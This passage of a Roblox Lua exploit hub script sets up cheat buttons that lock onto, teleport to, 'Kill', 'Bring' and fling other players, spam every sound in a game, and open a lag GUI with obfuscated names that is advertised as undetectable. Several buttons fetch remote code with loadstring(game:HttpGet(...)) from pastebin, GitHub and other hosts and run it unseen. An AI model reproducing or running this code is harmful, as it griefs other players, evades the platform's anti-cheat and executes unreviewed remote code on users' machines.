Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) else LockArm.BackgroundColor3 = col end end) end end) LockHeadACTIVE = false LockHead.MouseButton1Click:connect(function() LockHeadACTIVE = not LockHeadACTIVE for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService('RunService').Stepped:connect(function() if LockHeadACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.Head.CFrame LockHead.BackgroundColor3 = loc game:GetService('RunService').Stepped:connect(function() if LockHeadACTIVE then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) else LockHead.BackgroundColor3 = col end end) end end) LockAboveACTIVE = false LockAbove.MouseButton1Click:connect(function() LockAboveACTIVE = not LockAboveACTIVE for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService('RunService').Stepped:connect(function() if LockAboveACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(0, 4, 0) LockAbove.BackgroundColor3 = loc game:GetService('RunService').Stepped:connect(function() if LockAboveACTIVE then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) else LockAbove.BackgroundColor3 = col end end) end end) LockMaxACTIVE = false LockMax.MouseButton1Click:connect(function() LockMaxACTIVE = not LockMaxACTIVE for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService('RunService').Stepped:connect(function() if LockMaxACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.Head.CFrame game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Leg"].CFrame game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Right Leg"].CFrame game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Right Arm"].CFrame LockMax.BackgroundColor3 = loc game:GetService('RunService').Stepped:connect(function() if LockMaxACTIVE then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) else LockMax.BackgroundColor3 = col end end) end end) TrailACTIVE = false Trail.MouseButton1Click:connect(function() TrailACTIVE = not TrailACTIVE for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService('RunService').Stepped:connect(function() if TrailACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(5, 0, 0) Trail.BackgroundColor3 = loc game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false else Trail.BackgroundColor3 = col end end) end end) TeleportTo.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) ------ TOOLS ------------------------------------------------------------------------- ------ TOOLS ------------------------------------------------------------------------- ------ TOOLS ------------------------------------------------------------------------- ------ TOOLS ------------------------------------------------------------------------- Attach.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame end end) AttachExperimental.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame wait(1) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0, 100, 0) end end) Bring.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.6) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW wait(0.6) game:GetService("Players").LocalPlayer.Character:MoveTo(game:GetService("Players")[v.Name].Character.Position) end end) FreeFall.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.6) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW wait(0.6) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0, 50000, 0) end end) GiveTool.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.6) game:GetService("Players").LocalPlayer.Character:MoveTo(game:GetService("Players")[v.Name].Character.Position) end end) KillSurvive.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.4) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(10000, 10000, 10000)) wait(0.8) game:GetService("Players").LocalPlayer.Character:MoveTo(game:GetService("Players")[v.Name].Character.Position) wait(0.8) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW end end) Kill.MouseButton1Click:connect(function() for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.4) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(10000, 10000, 10000)) end end) superspinning = false SuperSpin.MouseButton1Click:connect(function() superspinning = not superspinning if superspinning then SuperSpin.BackgroundColor3 = loc for i, v in pairs(GetPlayer(EnterUsername.Text)) do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i, v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren()) do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame wait(1) while wait() do if superspinning then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end end else SuperSpin.BackgroundColor3 = col end end) end }) GUIS:AddButton({ Title = "FE Fling GUI", Description = "FE Fling GUI", Callback = function() loadstring(game:HttpGet('https://pastebin.com/raw/r97d7dS0', true))() --This link auto updates, so there's no need to update this file. end }) local Main = Window:AddTab({ Title = "Main", Icon = "globe" }) Main:AddButton({ Title = "Close", Description = "Closes UI if X or close button isnt working and closes keyboard script if u on mobile n ran genesis script and bring back ui button", Callback = function() if game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then game:GetService("CoreGui")["Keyboard gui WarriorRoberr Version"]:Destroy() end for i,v in pairs(game:GetService("CoreGui"):GetDescendants()) do if v.Name == "skyhubtoggle" then v:Destroy() end end for i,v in pairs(game:GetService("CoreGui"):GetDescendants()) do if v.Name == "ScreenGui" then for i,v in pairs(v:GetDescendants()) do if v.Name == "Frame" then v.Parent:Destroy() end end end end end }) Main:AddButton({ Title = "Rejoin", Description = "adds a rejoin button to kicked gui incase u get kicked from server", Callback = function() --Auto execute highly recommended (use it) gui = game:GetService("CoreGui").RobloxPromptGui.promptOverlay:WaitForChild("ErrorPrompt") gui.Size = UDim2.new(0, 400, 0, 230) leave = gui.MessageArea.ErrorFrame.ButtonArea.LeaveButton gui.MessageArea.MessageAreaPadding.PaddingTop = UDim.new(0,-20) gui.MessageArea.ErrorFrame.ErrorFrameLayout.Padding = UDim.new(0, 5) gui.MessageArea.ErrorFrame.ButtonArea.ButtonLayout.CellPadding = UDim2.new(0, 0, 0, 5) rejoin = leave:Clone() rejoin.Parent = leave.Parent rejoin.ButtonText.Text = "Rejoin" Players = game:GetService("Players") TeleportService = game:GetService("TeleportService") rejoin.MouseButton1Up:Connect(function() if #Players:GetPlayers() <= 1 then TeleportService:Teleport(game.PlaceId, Players.LocalPlayer) else TeleportService:TeleportToPlaceInstance(game.PlaceId, game.JobId, Players.LocalPlayer) end end) end }) Main:AddButton({ Title = "FE Bring Player", Description = "bring player", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/febringplayer.txt", true))() end }) Main:AddButton({ Title = "FE Key Teleporter Script", Description = "a key on ur keyboard teleports to a player made by xtebite#6500", Callback = function() -- https://v3rmillion.net/showthread.php?tid=1210201 -- //Made by xtebite#6500 getgenv().Keys = { "q", "e", "r", "t", "y", "u", "i", "o", "p", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m" } local usedKeys = {} local function addKeyValueToCharacter(char) local keyValue = Instance.new("StringValue") local randomKey = nil repeat randomKey = getgenv().Keys[math.random(1, #getgenv().Keys)] until not usedKeys[randomKey] keyValue.Name = "KeyValue" keyValue.Value = randomKey keyValue.Parent = char usedKeys[randomKey] = true local billboardGui = Instance.new("BillboardGui") billboardGui.Name = "KeyBillboard" billboardGui.Adornee = char.Head billboardGui.AlwaysOnTop = true billboardGui.LightInfluence = 0 billboardGui.Size = UDim2.new(2, 0, 2, 0) billboardGui.StudsOffset = Vector3.new(0, 3, 0) billboardGui.Parent = char.Head local keyLabel = Instance.new("ImageLabel") keyLabel.BackgroundTransparency = 1 keyLabel.Size = UDim2.new(1, 0, 1, 0) keyLabel.Image = "https://www.roblox.com/asset-thumbnail/image?assetId=13045815860&width=420&height=420" keyLabel.Parent = billboardGui local textLabel = Instance.new("TextLabel") textLabel.BackgroundTransparency = 1 textLabel.Size = UDim2.new(1, 0, 1, 0) textLabel.Position = UDim2.new(0, 0, -0.05, 0) textLabel.Font = Enum.Font.SourceSansBold textLabel.TextColor3 = Color3.new(0, 0, 0) textLabel.TextScaled = true textLabel.Text = randomKey:upper() textLabel.Parent = keyLabel end local function checkForNewCharacter(player) if player.Character and player ~= game.Players.LocalPlayer then addKeyValueToCharacter(player.Character) end player.CharacterAdded:Connect(addKeyValueToCharacter) end game.Players.PlayerAdded:Connect(function(player) checkForNewCharacter(player) end) for _, player in ipairs(game.Players:GetPlayers()) do checkForNewCharacter(player) end local userInputService = game:GetService("UserInputService") local textInputFocused = false userInputService.TextBoxFocused:Connect(function() textInputFocused = true end) userInputService.TextBoxFocusReleased:Connect(function() textInputFocused = false end) userInputService.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.Keyboard and not textInputFocused then local keyPressed = input.KeyCode for _, player in ipairs(game.Players:GetPlayers()) do if player ~= game.Players.LocalPlayer and player.Character and player.Character:FindFirstChild("KeyValue") then if player.Character.KeyValue.Value == keyPressed.Name:lower() then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = player.Character.HumanoidRootPart.CFrame end end end end end) end }) Main:AddButton({ Title = "FE Universal VR Script SkyVR", Description = "made by loadlua btw u need hats and u actually need to be on VR. i recommend checking the code at this line : 49818", Callback = function() -- SkyVR -- changelog and setup tutorial on skyvr.loadlua.xyz -- made by loadlua -- sourced mainly from sked's vr script -- made to work with rejectcharacterdeletions -- the net bypass is open-sourced on projects.loadlua.xyz -- auto updates :) -- vvv you can change the hands vvv getgenv().right = "Meshes/右手臂Accessory" -- https://www.roblox.com/catalog/5891633061/Phantom-Right-Hand getgenv().left = "Meshes/左手臂Accessory" -- https://www.roblox.com/catalog/5891632410/Phantom-Left-Shoulder -- FOR HEAD HATS -- choose hats that you want as your head and find their ingame names (use dex to find it) -- the values of each hat is the offset from the head. getgenv().headhats = { ["example hat 1"] = CFrame.new(0,0,0), ["example hat 2"] = CFrame.new(0,1,0), -- notice how there's a 1 in the offset, -- this means that the hat is moved up -- this is to represent where the hat would be in your avatar } getgenv().options = { outlinesEnabled = true, -- buggy-ish righthandrotoffset = Vector3.new(-100,100,30), -- rotation is fit for the phantom right hand accessory lefthandrotoffset = Vector3.new(-100,-100,-50), -- rotation is fit for the phantom left hand accessory headscale = 3, controllerRotationOffset = Vector3.new(90,0,0), -- change according to the chosen hand hats. if you're using phantom hands, dont change. HeadHatTransparency = 1, thirdPersonButtonToggle = nil, -- see what you look like (EXPERIMENTAL, set it to Enum.KeyCode.ButtonA if you want) leftToyBind = Enum.KeyCode.ButtonY, -- :D rightToyBind = Enum.KeyCode.ButtonB, -- :D leftToy = "", -- default is "" or nil rightToy = "", -- default is "" or nil } loadstring(game:HttpGet('https://portfolio.loadlua.xyz/files/VR%20Script.lua'))(); end }) Main:AddButton({ Title = "FE part mover", Description = "unanchored part mover", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/partmove.lua.txt", true))() end }) Main:AddButton({ Title = "FE Spam Sound", Description = "if it says yes than everyone can hear if no then no one can hear", Callback = function() local Notification = loadstring(game:HttpGet("https://raw.githubusercontent.com/Jxereas/UI-Libraries/main/notification_gui_library.lua", true))() local SoundService = game:GetService("SoundService") if SoundService.RespectFilteringEnabled == false then Notification.new("success", "Success", "Everyone can hear the sounds in this game!") Notification.new("message", "YouTube : darkModz", "YouTube - darkmodz") else Notification.new("warning", "Warning", "Unfortunately no one else can hear it in this game, try a different one.\nMaybe an older game will work.") end while wait() do for _, sound in next, game:GetService("Workspace"):GetDescendants() do if sound:IsA("Sound") then sound.Volume = 10 sound:Play() end end end end }) Main:AddButton({ Title = "FE Spam Sound 2", Description = "if it says false than everyone can hear if true then no one can hear", Callback = function() --[[ Made By Scripty#2063 If You Gonna showcase this , make sure to Credit me , do not take that you are owner of the script This Gui is Undetectable RespectFilteringEnabled must be false to use it --]] local ScreenGui = Instance.new("ScreenGui") local Draggable = Instance.new("Frame") local Frame = Instance.new("Frame") local Frame_2 = Instance.new("Frame") local Time = Instance.new("TextLabel") local _1E = Instance.new("TextButton") local UICorner = Instance.new("UICorner") local _3E = Instance.new("TextButton") local UICorner_2 = Instance.new("UICorner") local SE = Instance.new("TextButton") local UICorner_3 = Instance.new("UICorner") local Path = Instance.new("TextLabel") local Top = Instance.new("Frame") local Top_2 = Instance.new("Frame") local ImageLabel = Instance.new("ImageLabel") local TextLabel = Instance.new("TextLabel") local Exit = Instance.new("TextButton") local Minizum = Instance.new("TextButton") local Stop = Instance.new("TextButton") local UICorner_4 = Instance.new("UICorner") local IY = Instance.new("TextButton") local UICorner_5 = Instance.new("UICorner") local TextLabel_2 = Instance.new("TextLabel") local Wait = Instance.new("TextBox") --Properties: ScreenGui.Name = ". Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ" ScreenGui.Parent = game:GetService("CoreGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling ScreenGui.ResetOnSpawn = false Draggable.Name = "Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ." Draggable.Parent = ScreenGui Draggable.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Draggable.BackgroundTransparency = 1.000 Draggable.BorderSizePixel = 0 Draggable.Position = UDim2.new(0.35026139, 0, 0.296158612, 0) Draggable.Size = UDim2.new(0, 438, 0, 277) Frame.Name = ". . Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ. " Frame.Parent = Draggable Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame.BackgroundTransparency = 1.000 Frame.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame.BorderSizePixel = 0 Frame.Position = UDim2.new(-0.00133678317, 0, -0.00348037481, 0) Frame.Size = UDim2.new(0, 438, 0, 277) Frame_2.Name = " . Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ. " Frame_2.Parent = Frame Frame_2.BackgroundColor3 = Color3.fromRGB(30, 30, 30) Frame_2.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame_2.BorderSizePixel = 0 Frame_2.Position = UDim2.new(-0.00133678142, 0, -0.0179207586, 0) Frame_2.Size = UDim2.new(0, 438, 0, 238) Frame_2.Active = true Frame_2.Draggable = true Time.Name = "Time" Time.Parent = Frame_2 Time.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Time.BackgroundTransparency = 1.000 Time.Position = UDim2.new(0, 0, 0.0126050422, 0) Time.Size = UDim2.new(0, 437, 0, 31) Time.Font = Enum.Font.GothamSemibold Time.Text = "RespectFilteringEnabled(RFE) : nil" Time.TextColor3 = Color3.fromRGB(255, 255, 255) Time.TextScaled = true Time.TextSize = 14.000 Time.TextWrapped = true _1E.Name = "1E" _1E.Parent = Frame_2 _1E.BackgroundColor3 = Color3.fromRGB(45, 45, 45) _1E.BorderSizePixel = 0 _1E.Position = UDim2.new(0.0182648394, 0, 0.676470578, 0) _1E.Size = UDim2.new(0, 208, 0, 33) _1E.Font = Enum.Font.SourceSans _1E.Text = "Mute Game" _1E.TextColor3 = Color3.fromRGB(255, 255, 255) _1E.TextScaled = true _1E.TextSize = 30.000 _1E.TextWrapped = true UICorner.Parent = _1E _3E.Name = "3E" _3E.Parent = Frame_2 _3E.BackgroundColor3 = Color3.fromRGB(45, 45, 45) _3E.BorderSizePixel = 0 _3E.Position = UDim2.new(0.0159817357, 0, 0.142857149, 0) _3E.Size = UDim2.new(0, 209, 0, 33) _3E.Font = Enum.Font.SourceSans _3E.Text = "Annoying Sound" _3E.TextColor3 = Color3.fromRGB(255, 255, 255) _3E.TextSize = 30.000 _3E.TextWrapped = true UICorner_2.Parent = _3E SE.Name = "SE" SE.Parent = Frame_2 SE.BackgroundColor3 = Color3.fromRGB(45, 45, 45) SE.BorderSizePixel = 0 SE.Position = UDim2.new(0.509132445, 0, 0.142857149, 0) SE.Size = UDim2.new(0, 209, 0, 33) SE.Font = Enum.Font.SourceSans SE.Text = "Kill Sound Service" SE.TextColor3 = Color3.fromRGB(255, 255, 255) SE.TextSize = 30.000 SE.TextWrapped = true UICorner_3.Parent = SE Path.Name = "Path" Path.Parent = Frame_2 Path.BackgroundColor3 = Color3.fromRGB(255, 0, 0) Path.BackgroundTransparency = 1.000 Path.Position = UDim2.new(0.00684931502, 0, 0.815126061, 0) Path.Size = UDim2.new(0, 435, 0, 44) Path.Font = Enum.Font.GothamSemibold Path.Text = "Dev Note : This Script is FE and it only FE when RespectFilteringEnabled(RFE) is disabled , elseif RespectFilteringEnabled(RFE) is true then it only be client , mostly RespectFilteringEnabled(RFE) disabled game are classic game" Path.TextColor3 = Color3.fromRGB(255, 0, 0) Path.TextScaled = true Path.TextSize = 14.000 Path.TextWrapped = true Top.Name = "Top" Top.Parent = Frame_2 Top.BackgroundColor3 = Color3.fromRGB(41, 60, 157) Top.BorderColor3 = Color3.fromRGB(27, 42, 53) Top.BorderSizePixel = 0 Top.Position = UDim2.new(-0.00133678142, 0, -0.128059402, 0) Top.Size = UDim2.new(0, 438, 0, 30) Top_2.Name = "Top" Top_2.Parent = Top Top_2.BackgroundColor3 = Color3.fromRGB(30, 45, 118) Top_2.BorderColor3 = Color3.fromRGB(27, 42, 53) Top_2.BorderSizePixel = 0 Top_2.Position = UDim2.new(0, 0, 0.967638671, 0) Top_2.Size = UDim2.new(0, 438, 0, 5) ImageLabel.Parent = Top ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BackgroundTransparency = 1.000 ImageLabel.Position = UDim2.new(0, 0, 0.0666666701, 0) ImageLabel.Size = UDim2.new(0, 29, 0, 27) ImageLabel.Image = "http://www.roblox.com/asset/?id=8798286232" TextLabel.Parent = ImageLabel TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.Position = UDim2.new(0.997245014, 0, 0, 0) TextLabel.Size = UDim2.new(0, 397, 0, 30) TextLabel.Font = Enum.Font.GothamSemibold TextLabel.Text = "FELAG" TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextScaled = true TextLabel.TextSize = 14.000 TextLabel.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextWrapped = true Exit.Name = "Exit" Exit.Parent = Top Exit.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Exit.BackgroundTransparency = 1.000 Exit.Position = UDim2.new(0.924657524, 0, 0, 0) Exit.Size = UDim2.new(0, 32, 0, 25) Exit.Font = Enum.Font.GothamSemibold Exit.Text = "x" Exit.TextColor3 = Color3.fromRGB(255, 255, 255) Exit.TextScaled = true Exit.TextSize = 14.000 Exit.TextWrapped = true Minizum.Name = "Minizum" Minizum.Parent = Top Minizum.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Minizum.BackgroundTransparency = 1.000 Minizum.Position = UDim2.new(0.851598203, 0, 0, 0) Minizum.Size = UDim2.new(0, 32, 0, 23) Minizum.Font = Enum.Font.GothamSemibold Minizum.Text = "_" Minizum.TextColor3 = Color3.fromRGB(255, 255, 255) Minizum.TextScaled = true Minizum.TextSize = 14.000 Minizum.TextWrapped = true Stop.Name = "Stop" Stop.Parent = Frame_2 Stop.BackgroundColor3 = Color3.fromRGB(45, 45, 45) Stop.BorderSizePixel = 0 Stop.Position = UDim2.new(0.0182648394, 0, 0.310924381, 0) Stop.Size = UDim2.new(0, 424, 0, 33) Stop.Font = Enum.Font.SourceSans Stop.Text = "Stop" Stop.TextColor3 = Color3.fromRGB(255, 255, 255) Stop.TextSize = 30.000 Stop.TextWrapped = true UICorner_4.Parent = Stop IY.Name = "IY" 